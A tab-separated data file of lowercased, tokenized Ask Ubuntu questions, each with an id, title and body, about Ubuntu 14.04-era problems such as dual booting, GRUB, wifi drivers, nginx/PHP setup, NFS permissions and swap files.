460679	how do i install ubuntu on a debian pc ?	after windows closed windows xp i installed linux-debian on my pc and it 's not completely what i wanted . so a friend of mine told me to change to ubuntu . i already burned it on a cd and tried to open it in the boot menu but that wo n't work if you have n't run the .exe file in the downloaded package . but i have n't installed the program ( s ) to run .exe files . is there something i can do to run the .exe file or is there a version of ubuntu that can be installed from debian ? i 'm new to the linux software , so i really do n't know where to look for the right software .
460680	watching bluray disks	how do i watch blu-ray disks in ubuntu 14.04 ( or 12.02 ) ? i have libdplus installed and i have libbluray but i know that they are n't enough . is there a way to do that right now ? in the year 2014 ?
460682	upgrade 14.04 from 12.04	i use ubuntu 12.04 lts . i tried to upgrade it to 14.04 by booting from a usb stick . in the menu there were just two options - one was to install 14.04 by erasing 12.04 and another was to install 14.04 by erasing everything . but problem is both of them said that my documents , downloads and musics will be erased totally . is there a way in which i can upgrade my os to 14.04 without losing any data ?
460684	where is my iso file ?	when i download ubuntu 64 or 32 bit my computer downloads a .zip file instead of a .iso file . when i open the .zip file it is full of folders and i ca n't find my .iso in any of them ? does anyone know where i can find my .iso file in the .zip file , or can anyone suggest were i can download the .iso directly ? please help . i need this as i would like to dual boot with ubuntu and test it beforehand on virtualbox but can not find the .iso file .
460686	using part of an external hard drive for ubuntu and another part for windows	i have a 1tb external hard drive that i have installed ubuntu 14.04 on , partioned as 150gig for ubuntu and 2gig for swap space . the remaining memory is free . what i am wanting to do is use the remaining 800+gigs for misc files in windows 7 while keeping ubuntu separate . since the drive is partioned as ext4 file system , windows will not even recognise the drive . is this possible ?
460692	why does this command keep popping up when i open my terminal	here 's an image of the problem : it says `` adds '' or something . is there any way to get rid of it ? also im using uxterm but it happens in all other terminal
460693	server command ?	hi all i 've got a couple of questions . i was asked to log into an online server and i have to figure out these questions : find the command that will show you the month of your birthday in the year 2024 ( ten years into the future ) . a cataclysm happened in september 1752 . find the command that will show you the calendar for the entire year 1752 so that we can check on september . find out what kind of cpu is in the server . i 'm having a hard time figuring out the commands for these . all help is appreciated . thanks !
460694	in which drive my data is getting stored in ubuntu	i have windows 7 on my system . on starting pc , it asks me to select windows 7 or ubuntu 12.04 . in windows , i have 3 parts , drive c , d , j . when i open ubuntu , i have category named `` devices '' . in that , those parts ( c , d , j ) are there with different names . but a part named `` 79 gb system '' seems to be c drive of windows but it has some things which are not visible in windows . so what is this ? secondly , there is category in ubuntu named `` file system '' . in that i have all sections like boot , etc , dev , root , run ... so , now what is this ? what is the relation between that devices and this file system ? where is this file system stored ? when i am storing my c , c++ files in home/username -- > then where is it getting stored ? in which drive ? like c , d or j of windows ? i am getting confused with all this . thanks in advance .
460695	access xephyr session twice	ok ; so i 've got a gnome-session running on xephyr flawlessly . what i need is to access that session from another xephyr window , meaning i get two windows showing the exact same display ( as if i was connected via vnc ) . after three days of goggling , i still have no clue . any alternative method to get the same result ( two instances of the same nested session running on a same screen ) is appreciated
460699	trouble connecting to wifi	my msi wind u100 notebook , running ubuntu 14.04 , does not detect my wireless connections . i have reinstalled it but it still does not detect my wifi connection .
460700	how do i customize grub2 entries for other operating systems ?	i have ubuntu 14.04 installed on my system , and i am using it as the sort of host os allowing its version of grub to be the boot loader and allowing it to manage all of the grub configuration . when i run `` update-grub '' to update the grub config file with the newly installed operating systems it does that just fine , but i ca n't find any way to add custom things to these entries without editing the actual `` grub.cfg '' which it says not to do . the customizations i am looking to add would be things like `` quiet splash=silent '' for opensuse in order to get its splash screen . just adding `` quiet '' for arch linux , and adding `` quiet rhgb '' for fedora in order to use its splash screen . i was wondering if there is any official way to do this other than editing the file it says not to edit ?
460708	ubuntu boot menu wont show up . it directely boots into windows 8	i recently wanted to dual boot ubuntu 14.04 in my hp envy m6 laptop . the entire install process went smoothly . when i reboot it automatically boots into windows 8 . btw , windows 8 was already pre-installed in my laptop . the only way for me to boot into ubuntu is to press f9 and go into boot devices options and from there select ubuntu . i 've tried using boot repair but it gives me an error ( http : //paste.ubuntu.com/7394197 ) . how do i make grub my default boot loader and from there boot into windows ? i desperately need help . thanks
460710	nginx and php downloades index.php instead of processing it	i have been banging my head for 2 days now . the issue is that the index.php is downloaded instead of being processed . i 'm using ubuntu 14.04 , nginx , php5 . the nginx/site-available/default is as below . i have added the index.php entry as prescribed by many posts . server { listen 80 default_server ; listen [ : : ] :80 default_server ipv6only=on ; root /usr/share/nginx/html ; index index.php index.html index.htm ; # make site accessible from http : //localhost/ server_name localhost ; location / { # first attempt to serve request as file , then # as directory , then fall back to displaying a 404. try_files $ uri $ uri/ =404 ; # uncomment to enable naxsi on this location # include /etc/nginx/naxsi.rules } # only for nginx-naxsi used with nginx-naxsi-ui : process denied requests # location /requestdenied { # proxy_pass http : //127.0.0.1:8080 ; # } # error_page 404 /404.html ; # redirect server error pages to the static page /50x.html # # error_page 500 502 503 504 /50x.html ; # location = /50x.html { # root /usr/share/nginx/html ; # } # pass the php scripts to fastcgi server listening on 127.0.0.1:9000 # # location ~ \.php $ { # fastcgi_split_path_info ^ ( .+\.php ) ( /.+ ) $ ; # # note : you should have `` cgi.fix_pathinfo = 0 ; '' in php.ini # # # with php5-cgi alone : # fastcgi_pass 127.0.0.1:9000 ; # # with php5-fpm : # fastcgi_pass unix : /var/run/php5-fpm.sock ; # fastcgi_index index.php ; # include fastcgi_params ; # } # deny access to .htaccess files , if apache 's document root # concurs with nginx 's one # # location ~ /\.ht { # deny all ; # } } # server { # listen 8000 ; # listen somename:8080 ; # server_name somename alias another.alias ; # root html ; # index index.php index.html index.htm ; # # location / { # try_files $ uri $ uri/ =404 ; # } # } # https server # # server { # listen 443 ; # server_name localhost ; # # root html ; # index index.php index.html index.htm ; # # ssl on ; # ssl_certificate cert.pem ; # ssl_certificate_key cert.key ; # # ssl_session_timeout 5m ; # # ssl_protocols sslv3 tlsv1 tlsv1.1 tlsv1.2 ; # ssl_ciphers `` high : ! anull : ! md5 or high : ! anull : ! md5 : ! 3des '' ; # ssl_prefer_server_ciphers on ; # # location / { # try_files $ uri $ uri/ =404 ; # } # } the nginx.conf is as below.. user www-data ; worker_processes 4 ; pid /run/nginx.pid ; events { worker_connections 768 ; # multi_accept on ; } http { # # # basic settings # # sendfile on ; tcp_nopush on ; tcp_nodelay on ; keepalive_timeout 65 ; types_hash_max_size 2048 ; # server_tokens off ; # server_names_hash_bucket_size 64 ; # server_name_in_redirect off ; include /etc/nginx/mime.types ; default_type application/octet-stream ; # # # logging settings # # access_log /var/log/nginx/access.log ; error_log /var/log/nginx/error.log ; # # # gzip settings # # gzip on ; gzip_disable `` msie6 '' ; # gzip_vary on ; # gzip_proxied any ; # gzip_comp_level 6 ; # gzip_buffers 16 8k ; # gzip_http_version 1.1 ; # gzip_types text/plain text/css application/json application/x-javascript text/xml application/xml application/xml+rss text/javascript ; # # # nginx-naxsi config # # # uncomment it if you installed nginx-naxsi # # # include /etc/nginx/naxsi_core.rules ; # # # nginx-passenger config # # # uncomment it if you installed nginx-passenger # # # passenger_root /usr ; # passenger_ruby /usr/bin/ruby ; # # # virtual host configs # # include /etc/nginx/conf.d/*.conf ; include /etc/nginx/sites-enabled/* ; } # mail { # # see sample authentication script at : # # http : //wiki.nginx.org/imapauthenticatewithapachephpscript # # # auth_http localhost/auth.php ; # # pop3_capabilities `` top '' `` user '' ; # # imap_capabilities `` imap4rev1 '' `` uidplus '' ; # # server { # listen localhost:110 ; # protocol pop3 ; # proxy on ; # } # # server { # listen localhost:143 ; # protocol imap ; # proxy on ; # } # } solution followed till now . added the entry of index.php deleted the line default_type application/octet-stream ; in nginx.conf uncommented the fastcgi entries in default file . i also tried these solution on the same problem but they did n't work for me . http : //stackoverflow.com/questions/16747980/nginx-and-php-fpm-is-downloading-index-php-instead-of-processing-it one more link like it on stack overflow , along side many on other websites . any help would be deeply appreciated .
460714	usb drive wo n't boot iso after customizing grub . boot flag is set	i recently customized grub and it works very nicely ; the computer boots quickly to ubuntu or win7 -- - whatever i choose . but , now when i go into bios , select boot from usb stick -- -when it restarts it just goes to grub . it skips the usb choice . what do i do to fix this ? everything else works like a charm . p.s . i 've tried plop , rewriting the iso onto the usb stick , and using other os iso 's . it did n't fix the issue . i use the dd method in the terminal and gparted to format ... .this all started after i customized grub . i also set the boot flag . so it should work . but it does n't . after i try booting it like says the partition table has become corrupted on gparted . so like , it tries to boot from it then it must get corrupted and just go to grub ... do i need to reinstall grub ? is there a bug ? idk , help ? or a different boot loader all together ?
460715	i 've submitted an app for the software center , but it 's status says `` draft '' . what does this mean ? do i need to do something still ?	i created a common network program . i think that it 's very useful for users that use internet . so i uploaded it at https : //myapps.developer.ubuntu.com/dev/apps as you look at following picture . and it 's status is `` draft '' . what does that mean , is there some action i need to take ?
460716	vnc mac to ubuntu on trusted network	i am only interested in getting into my system on my lan . i 've got my firewall set up so that it blocks incoming packets that are not from the lan . i can ssh into my ubuntu machine but i ca n't vnc into it from my mac . i 've tried the built in mac viewer ( from the go menu ) and realvnc 's viewer for mac . neither work . i 'm kind of stumped . i know that using it via ssh is the usual configuration but i do n't want to use it through an ssh tunnel in this case as i am confident that my lan is secure and not even my ssh terminal is visible outside of my lan . is there some configuration option missing ? i 'm using ubuntu 14.04 . as an edit , trying on my mac gets an error message saying that the vnc version is incompatible . also , i did try to setup the ssh tunnel as well , it did n't work either .
460717	question about ssh on 14.04 with nautilus	when trying to connect via ssh with nautilus ubuntu 14.04 , if you do not specify the folder to which you want to access does not show me any directory . so if i want to connect to any folder system like /etc i would specify the path to ssh : '' ip '' /etc so if you access , but if i want to move above can not . so to connect to the root of a system should specify ssh : / '' ip '' / , which gives an error . instead it will automatically in ubuntu 12.04 gives you the / as the default route , watching the whole directory tree . anyone know anything or tried to ? because if you want to go on moving files i need to stay on / to see all of them . thanks
460719	wireless driver for ubuntu 14.04 2012 macbook pro 13.3 ( unibody )	yesterday , i finally was able to install ubuntu 14.04 on my mid-2012 macbook pro 13.3in ( non-retina ) . i 'm very new to this and i 'm not sure how to get the wireless driver . i 've already gone through a lot of ubuntu 's resources and i 'm still lost . any advice ? thanks in advance .
460720	installing linux in specific partition ?	i 've 4 partitions on my hdd ( c , d , e , f ) . i want to install linux ( dual boot with xp ) in e partition . i want to know how can i ? i 've watched many tutorials on it but every time the author seems to have only one partition ( c ) or he do partitioning while installing ( something like sda , dev [ do n't know about them , first time going to try linux ] ) . i will format my e drive . but worried that will it give me option about installing in e ? thanks in advance .
460721	web browser unable to open any pages while any other app is downloading at full speed	this problem only started recently , after i installed ubuntu gnome 14.04 , and i believe only after more recent updates . basically if i 'm downloading at full speed in another app like transmission or jdownloader , web browsers will cease to load anything . previously while speed would be slow in the browser , you could still surf fine and apparently the network traffic would be managed on the back end . now one app just seems to take all the available bandwidth 100 % and web browsing ceases to work at all . if i throttle the bandwidth available to those other apps then browsing will work again , but this seems like incredibly poor network resource management to 100 % cripple web browsing like that . is there something that got changed in the kernel , or in a config file somewhere ? i honestly do n't recall this kind of behavior happening any time in previous years . like i said , it seems that previously your browsing might be more slow , but that it would just borrow some bandwidth while it was loading the page rather than having one app be able to take 100 % and completely prevent another app from making any connection at all .
460722	problems with adobe flash	i just got linux lubuntu 14.04 on my computer and i have some problems with adobe flash . if i do not have my flash installed than youtube videos are working but not all . but when i install flash none of the players are working , not even youtube . can anyone help me please ?
460723	ubuntu 14.04 startup difficulty	i installed universal media server 3.6 on ubuntu 14.04 desktop . what i want to do is , to launch it during startup . how to add this into startup ? any suggestions ? thanks in advance .
460729	duplex ( double sided ) print not available	i have a brother hl-3150cdw printer , installed the driver from their website , and i can print fine , except that duplex ( double sided print ) is not available . i 've tried from a windows computer and it works there , so i know it 's possible . any ideas on how this can be fixed in ubuntu ? ( i 'm on 12.04 ) thanks , the hoff http : //support.brother.com/g/b/downloadlist.aspx ? c=eu_ot & lang=en & prod=hl3150cdw_eu & os=128
460734	detect file size decrease	i am saving streams from browser cache into my home folder . i wrote a script that takes the specific data type and saves them into disk , and names them as data.1 , data.2 , data.3 and so on , creating new file names without overwriting the old ones . sometimes the stream gets reset and starts from the beginning . when this happens the size of the new file data.n decreases compared to data.n-1 . would it be possible to detect this decrease in file size and alert me ( say with a terminal beep ) ?
460735	ubuntu boot from internal hdd fails with `` unable to find media containing live file system '' message	i have created a dvd containing ubuntu 14.04 and have successfully run 14.04 from it . i have taken the option to install 14.04 as a dual boot with windows xp . the installation appeared to go smoothly and i have two extra partitions on my windows 'c ' drive , /dev/sda6 and /dev/sda7 . when i switch on the laptop i get the dual boot option . the windows xp boot works ok ( i 'm using it now ) , but the ubuntu 14.04 boot option runs so far , then terminates with the message : ( initramfs ) unable to find a medium containing a live file system . any help will be gratefully accepted ! roger
460736	how do i restore the default unity login screen after removing xubuntu ?	i have installed xubuntu on top of ubuntu on my system , and i tried it out , and i found out that i like unity a lot more than xfce . i have removed all ( or all that i know ) of the xubuntu packages , but i still have the xubuntu login screen . the xubuntu login screen looks a lot more like unity now , but it is not the default one . here is a link to what the login screen looks like now : https : //docs.google.com/file/d/0bx1v4cwjskhhmfhodw1ubmoxbxnptlpnulczsejdmlpeenhr any help is greatly appreciated : d
460738	no background for launcher icons ( 14.04 )	using ubuntu 14.04 64-bit with nvidia 331.38 proprietary and tested drivers . recently the icons in the launcher have no longer got any background color . there are also differences to the indication of how many windows are open of one application . this happened without warning or errors , modifications or tweaks on startup an ordinary day . have absolutely no idea what additional information i can give you , want to know something use the comments . i 've tried the following things : resetting unity in every way possible , i 've resetted all settings all icon themes all settings ( you see numix in the screenshot cause why not ) . i 've also changed drivers multiple times . and yes , i 've restarted my computer ... and unity : ) previous post with similar issues , no solution that works : post update : as i entered the settings for ubuntu i discovered that parently many of the default unity elements had no background either . see image # 2 .
460739	how do i check for updates for my amd radeon 5870 graphics card ?	i am new to the whole linux os and the differences when it comes to updating software on the laptop i have . so , without further ado , my question ! i followed this link here to get the driver for my radeon hd 5870 graphics card : https : //www.kubuntuforums.net/archive/index.php/t-64125.html i was successful , but now i wonder . how do i check for updates for the drivers ? i have the catalyst control center for my linux , which is 64bit , but i do n't understand how to make it check for updates . any help is appreciated ! thanks !
460740	ubuntu seems to mount flash drives and sd cards , but they will not open in nautilus	i am running ubuntu 14.04 , 64 bit , and have had essentially no issues with it thus far . however , whenever i plug in a usb flash drive or an sd card , it seems to open in shotwell . first i went to the `` system settings '' and then `` details '' and tried to adjust the default actions upon removable media being inserted , as i was almost certain that those settings would be pertinent to the issue . no settings changed the issue , at all . if i right click on the unity icon , and then click `` open '' or even left click the unity icon , it first opened in shotwell , never nautilus . does anybody know what i could do to simply open removable media in nautilus once again , or at least have the option in unity ? the drives appear to be fully mounted at all times . i am able to access the drives by opening nautilus , plugging in the removable media , and waiting for the removable media to appear in the left column , that works perfectly fine . the remaining issue is the automatic opening of shotwell upon inserting removable media , and the lack of ability to open the device in nautilus automatically or from unity . all help appreciated !
460747	hplip documents held but never print	i have hplip-3.14.4 with an hp photosmart b210a and recently it has stopped printing properly . the issue is that it tries to print from the photo tray ( which we do n't use ) . i 've tried setting this manually via the settings page , but it makes no difference . my wife has the same issue ( also using ubuntu 12.04 ) . edit : i 've just set the printer up in windows 7 and it works . so this is not a hardware fault and likely due to hplip or some ubuntu software issue . rolling back the driver to 3.13.8 does not make any difference . what else can i try edit2 : i upgraded to hplip-3.14.6 . this seemed to fix the issue until i rebooted which caused it to return . i 've also noticed that clicking on the hp icon gives a menu with several options listed twice . i 'm also often getting a communication error with the printer .
460748	do i need to worry about defragmentation ?	i am new to ubuntu ( and linux in general , as a home installer/user ) . do i need to worry about fragmentation of the file system on a linux partition on one 's hard drive ?
460752	how to install primus on ubuntu 14.04	after upgrading from 13.10 to 14.04 i was trying to install primus on my system ( i have bumblebee installed and i can use optirun , although some applications , e.g . gmod , wo n't run ) , but this is what i get gabriele @ gabriele-asus : ~ $ sudo apt-get install primus reading package lists ... done building dependency tree reading state information ... done the following extra packages will be installed : primus-libs primus-libs : i386 primus-libs-ia32 : i386 recommended packages : primus-libs-ia32 the following new packages will be installed : primus primus-libs primus-libs : i386 primus-libs-ia32 : i386 0 upgraded , 4 newly installed , 0 to remove and 0 not upgraded . need to get 0 b/115 kb of archives . after this operation , 717 kb of additional disk space will be used . do you want to continue ? [ y/n ] selecting previously unselected package primus-libs : amd64 . ( reading database ... 491442 files and directories currently installed . ) preparing to unpack ... /primus-libs_0~20131127-2_amd64.deb ... unpacking primus-libs : amd64 ( 0~20131127-2 ) ... selecting previously unselected package primus . preparing to unpack ... /primus_0~20131127-2_amd64.deb ... unpacking primus ( 0~20131127-2 ) ... preparing to unpack ... /primus-libs_0~20131127-2_i386.deb ... unpacking primus-libs : i386 ( 0~20131127-2 ) ... dpkg : error processing archive /var/cache/apt/archives/primus-libs_0~20131127-2_i386.deb ( -- unpack ) : trying to overwrite '/usr/lib/i386-linux-gnu/primus/libgl.so.1 ' , which is also in package primus-lib : i386 201303160901git~precise1 selecting previously unselected package primus-libs-ia32 . preparing to unpack ... /primus-libs-ia32_0~20131127-2_i386.deb ... unpacking primus-libs-ia32 ( 0~20131127-2 ) ... processing triggers for man-db ( 2.6.7.1-1 ) ... errors were encountered while processing : /var/cache/apt/archives/primus-libs_0~20131127-2_i386.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) i tried to clean aptitude with clean and autoclean , but with the same result . how can i solve this ?
460753	rt3290 bluetooth not pairing in ubuntu 14.04	i recently followed the instructions listed in the following link to get my rt3290 bluetooth working on my laptop . these instructions have yielded the most progress i have had in the year i have had this laptop . my machine now sees my bluetooth , i can scan for and see devices , and other devices and see my laptop , but pairing continually fails . ralink rt 3290 bluetooth problem on ubuntu 14.04 -lscpi reads 04:00.1 bluetooth : ralink corp. rt3290 bluetooth -rfkill list reads 0 : hci0 : bluetooth soft blocked : no hard blocked : no -dmesg | grep blue reads [ 5.965811 ] bluetooth : core ver 2.17 [ 5.965833 ] bluetooth : hci device and connection manager initialized [ 5.965840 ] bluetooth : hci socket layer initialized [ 5.965842 ] bluetooth : l2cap socket layer initialized [ 5.965847 ] bluetooth : sco socket layer initialized [ 6.038085 ] bluetooth : bnep ( ethernet emulation ) ver 1.3 [ 6.038088 ] bluetooth : bnep filters : protocol multicast [ 6.038096 ] bluetooth : bnep socket layer initialized [ 6.058013 ] bluetooth : rfcomm tty layer initialized [ 6.058024 ] bluetooth : rfcomm socket layer initialized [ 6.058029 ] bluetooth : rfcomm ver 1.11 any one have any thoughts or ideas i could try ? thanks in advance for your time and assistance .
460758	canoscan 9000f mark ii on ubuntu 14.04	i am trying to install the canoscan 900f mark ii on ubuntu 14.04 . using the hints from ubuntu 14.04 setup for canoscan 9000 mark ii , i am able to detect the scanner and scanimage -l shows the correct device . however , when i try to do a test scan , i get an error `` scanimage : reading one scanline , 1914 bytes ... fail error : error during device i/o '' . any suggestions ?
460760	just installed 14.04 in place of xp , no wireless connections showing in network manager	i just upgraded my samsung nc10 netbook with broadcom bcm 3411 wlan to 14.04 . i 'm not seeing any wireless connection choice under network manager , but it connects just fine on ethernet . ubuntu newbie , so may be missing something obvious . ran rfkill list all : sudo rfkill list all 0 : hci0 : bluetooth soft blocked : yes hard blocked : no 1 : samsung-wlan : wireless lan soft blocked : no hard blocked : no also ran lshw -class network : sudo lshw -class network *-network description : network controller product : bcm4311 802.11a/b/g vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:02:00.0 version : 01 width : 32 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : driver=wl latency=0 resources : irq:16 memory : f0100000-f0103fff *-network description : ethernet interface product : 88e8040 pci-e fast ethernet controller vendor : marvell technology group ltd. physical id : 0 bus info : pci @ 0000:03:00.0 logical name : eth0 version : 13 serial : 00:13:77 : d1 : ff:97 size : 100mbit/s capacity : 100mbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=sky2 driverversion=1.30 duplex=full ip=10.0.0.47 latency=0 link=yes multicast=yes port=twisted pair speed=100mbit/s resources : irq:42 memory : f0200000-f0203fff ioport:2000 ( size=256 ) all assistance much appreciated ! thanks !
460762	system freeze after waking up from sleep ( suspend )	i had a heating problem lately after i 've been using the xorg driver for the intel apu ( integrated graphics card ) so i upgraded to fglrx proprietary driver . but then i faced another problem , whenver i wake up my laptop after being suspended , it freezes . in rare cases i can move the mouse a little bit but it 's just for 2-3 seconds , and it freezes again . i have to hard-reset it then . my graphics card is radeon hd 7730m . how can i fix this ?
460763	how to setup dual boot with two drives with two different versions of ubuntu ( v12/v14 ) ?	i 'm not sure if this is truly a ubuntu question , as it 's more of a boot question ( bios/cmos perhaps ) . i have an existing ubuntu v12.04 on one hhd drive . i do n't want to partition that drive ; not much room . i have installed ubuntu 14.04 on a new ssd drive . i wish to use both systems at different times . now i 'm wondering if i can setup a boot selection of some kind . would i just need to change the bios/cmos boot order to load the version i wish to use ? does anyone know of a better approach ? thank you .
460764	ca n't share second hdd with samba	this is my first question on askubuntu so i hope i 'm doing it right . two days ago i started working on a simple server to be used for file sharing and backups . the installation of both the os as well as the software went well and i had no problems with any of that . i installed the newest version desktop version of ubuntu onto an ssd and wanted to use my hdd as the backup and file sharing location . i formated the drive to ext4 , setup a label for it and set it to automount . i then created the folders , users , installed samba , setup the samba passwords for the users and all the rest that was required . when i connected to the server all seemed to be working . the directories showed up but when i tried to explore them i just could n't . so the issues that while i can see the folders i want to share i ca n't actually read them . at first i just assumed that i messed up the permissions and that 's why it is n't working and based on that i spent all day yesterday and today trying to fix it . when i finally got tired of it i tried creating a directory on my desktop and sharing that . to my surprise that worked flawlessly so i 'm now guessing that the problem is with the second drive . i 've spent a few hours trying to find a solution , that search lead me here . i tried one of the answers posted on this site but it did n't help . if anyone can help me with this i 'd greatly appreciate it .
460766	ubuntu 14.0 first startup	i installed it and when i was done i turned my pc on . i wrote my name in it and password and then i logged in . now it says : corne @ ubuntuhg366-16lol : ~ $ [ 53.274049 ] sd 6:0:0:0 : [ sdb ] asking for cache data failed [ 53.274056 ] sd 6:0:0:0 : [ sdb ] assuming drive cache write through
460767	ubuntu 14.04 wireless lan issues	i just updated from ubuntu 12.04lts to 14.04lts . every time i boot into ubuntu , the wireless lan is both hard blocked and soft blocked . i need to press fn then f3 to hard unblock wireless . after that , i still need to use the terminal to soft unblock it [ rfkill unblock all ] . is there anything i can do to make my computer automatically turn on wireless lan once it is booted ?
460770	analyse disk space usage of an encrypted home directory	i 'm having some problems with a full disk . according to df -k i 'm using 47 gb of data in my home folder and i have no idea where all of that data is hiding . i tried using the disk usage analyser aka baobab but since my home directory is encrypted i ca n't analyse which folders are using all of the data ( since the $ home directory is just a virtual representation of my encrypted data and is more of a phantom view so baobab just keeps scanning endlessly without counting any data when i ask it to just scan my home directory ) . does anyone know of a good method to analyse where all of my disk space went ? ? btw does anyone have some good suggestions for clearing up disk space ?
460772	how to create swap file on ext4	my friend whats to create a 4gb swap file on his ext4 file system . because he is using a chromebook acer c7 the way he installed he did not have a chance to specify swap partition and now he want to create a swap file on his file system . this is the guide he is following http : //ubuntuforums.org/showthread.php ? t=1618220 & p=10098565 # post10098565 first you have to create a 2gib file , for example in /mnt : sudo dd if=/dev/zero of=/mnt/swap bs=1m count=2048 then format the file to swap : sudo mkswap /mnt/swap add the swap file to the system : sudo swapon /mnt/swap check it out , i.e . : free -m edit the fstab file : gksu gedit /etc/fstab and add this line at the end of the file : /mnt/swap none swap sw save the file and exit . that 's all . this is what he is getting user @ chrubuntu : ~ $ sudo swapon /mnt/swap swapon : /mnt/swap : swapon failed : invalid argument and his fstab looks like this any way to fix this ? ? one more thing he is using ubuntu 14.04 and it is not a fresh install thank you for your time
460776	disable gui at boot time	i want to disable gui at boot time . i followed these steps : sudo nano /etc/default/grub find out this line : grub_cmdline_linux_default= '' quiet splash '' change it to : grub_cmdline_linux_default= '' text '' update grub : sudo update-grub reboot but nothing happened ! i can access gui remotely using xrdp . what i 'm missing here ?
460777	touchegg setup issues on ubuntu gnome 14.04 - macbookpro 11,1	the issue : touchegg only works with terminal open . hi , i 'm trying to setup touchegg so i emulate mac osx multitouch gestures on ubuntu . from what i 've read on the internet , it does work with ubunto gnome 14.04 , not unity . i have managed to install touchegg , edit the touchegg.conf file , and run it in terminal ( literally typing in `` touchegg '' ) to test the new gestures and it works , but only when terminal is open . i followed most of the setup directions ( that applied since this is for unity in ubuntu 12.10 ) from this link : http : //ineed.coffee/1068/os-x-like-multitouch-gestures-for-macbook-pro-running-ubuntu-12-10/ i got lost in the instructions where you make it so that touchegg starts automatically upon startup . i created a .desktop file accordingly , placed it in the mentioned directory , and it does n't work . i 'm guessing this is why touchegg wo n't run without terminal . what should i do ? thank you ! ( be warned , i am a complete noob )
460780	can webmin create a network interface bond for ubuntu 12.04 ?	i just picked up webmin today after being fed up with using the command line for 6 months for my server running ubuntu 12.04 . i have liked it so far and have fixed many problems i had before . i have decided i would like to bond my 2 ethernet interfaces to double my bandwidth the link aggregation standard . i googled how to do and came up with one useful page that said click on create new bond under network interfaces . i apparently do n't have that button . is there a module i must install ?
460782	lubuntu keyboard layout changed after upgrade	i have been running lubuntu 13.10 on a netbook with a french keyboard , with the default language set to english . when i upgraded to 12.04 , the default keyboard layout changed to us . at the login screen , the keyboard layout must still be french as i have to type in the password as if the keyboard were french . when i log into the guest session , the panel indicator shows the us layout but quickly switches to french before i can type anything . however , when i log into my own session , the keyboard remains us . i have used lxkeymap to set the keyboard layout to french , but the change is n't permanent . now , when i start lxkeymap the layout immediately switches to french . i have tried the solutions suggested here but none of them make the change permanent . how can i permanently set the default layout to french ?
460784	high end ubuntu for 7 inch instead of 10 inch tablet	i have read the specs for ubuntu touch . is it possible to run it on a 7 or 8 inch quad core tablet instead of dual core processor if it meets all the other specs ? are these minimum specs or does it present a display problem if the screen is smaller than 10-12 inches ?
460788	is there a way to enable window borders in 14.04 ?	window borders have been disabled in ubuntu 14.04 by default . this can be distracting when there are overlapping console windows . is there a way to enable them , and if so , how ?
460790	how do you set the ssh default directory ?	i have installed the ssh server package and have tried to login to my server from a client machine which is windows system . when i connected to the server using sftp , the server copied to \home\user\mydirectory , but not \var\www\mydirectory . it seems that i need configure the ssh server default directory for the users . how may this be accomplished
460793	ubuntu 14.04 nfsv3 now squashing user/group , how to fix ?	i have been running ubuntu against my readynas pro for some time . the readynas radiator code is based on debian . i did not change anything on the readynas side . i just performed the 14.04 upgrade from 13.10 , and to my surprise , nfsv3 behaviour changed . mounts work fine as before . i can mount the filesystems as expected . i have coordinated uid/gid on client and server side . looking at id and ls -l uid/gid shows they are the same on both sides ( 1005/1000 ) . but if i create a new file , or attempt to access an existing file or directory , i get a client side permission failure . specifically , any attempt to create a new file shows user id nobody and user group nogroup , any attempt to access through a directory that is n't a+x fails , and any attempt to read a file that is not a+r fails . i have manually added no_all_squash on the readynas side and exportfs -vr with no change . so this plus the problem starting on the upgrade suggests something on the ubuntu client side is squashing the uid/gid . but i was pretty sure squashing was a server side function . i did notice that domain name was n't aligned after the upgrade , so i have made sure hostname -- domain returns the same on both sides . i have run out of ideas on how to debug this . i am reduced to reading change logs from upstream to try to figure out what changed . does anyone have suggestions on what to look at next ? googling this issue has not been helpful so far . any help would be appreciated .
460794	windows 8 wo n't boot after running ubuntu studio 14.04 live dvd	i have a toshiba satellite c55-a with 6gb ram , a 750gb hard drive , and an intel i3 with windows 8 . i ran a ubuntu studio 14.04 live dvd , but when i tried to boot back into windows 8 , i got a black screen . it said there was no bootable data , and to put a boot disk in . i tried using my windows recovery disk and it allowed me to do a system restore , but i still got the same black screen after . i then put my restore disk in again and chose recovery options which took me to another screen where i can access the advance settings . the effi settings option was missing and when i chose system restore it said that the partition my system image is on is locked . i do n't have a boot disk for windows 8 , just a restore disk . i have n't installed ubuntu , only run it from the install disk . how do i unlock it ? why were the effi settings not available ?
460802	connect to server does not have type	i tried to connect my ssh server on my local machine . i use ctrl-l to connect to server , but it does not have type and port to let me select , it looks like my system does not recognize my local ssh server , can you please advise where i need to check to make sure ssh server is configure correctly ? your help and information is great appreciated , regards , inung
460803	please help me install wifi driver	i am having trouble understanding how to install asus wifi driver . here are the instructions . i have gotten the first 3 parts done correctly i believe . part 4 confuses me . i open the os/linux/config.mk file and i found where is states has_wpa_supplicant . but the formatting is different . it looks like this : ifeq ( $ ( has_wpa_supplicant ) , y ) wflags += -dwpa_supplicant_support ifeq ( $ ( has_native_wpa_supplicant_support ) , y ) wflags += -dnative_wpa_supplicant_support -dcredential_store -dprofile_store endif endif can someone show me what i should have on those lines ? also what directory should i be in when i enter make and make install ?
460804	sony reader prs-t1 is not detected	my sony reader prs-t1 is not detected . i have ubuntu 12.04 i checked with lsusb , this is the ouput : juanvi @ olddesktop : ~ $ lsusb bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 001 device 004 : id 04b8:0121 seiko epson corp . perfection 2480/2580 photo [ gt-f500 ] bus 002 device 002 : id 0e6a:6001 megawin technology co. , ltd gembird flexible keyboard kb-109f-b-de bus 002 device 003 : id 046d : c050 logitech , inc. rx 250 optical mouse juanvi @ olddesktop : ~ $ for your information . other devices are detected in the same usb connexion . do i need any drivers ?
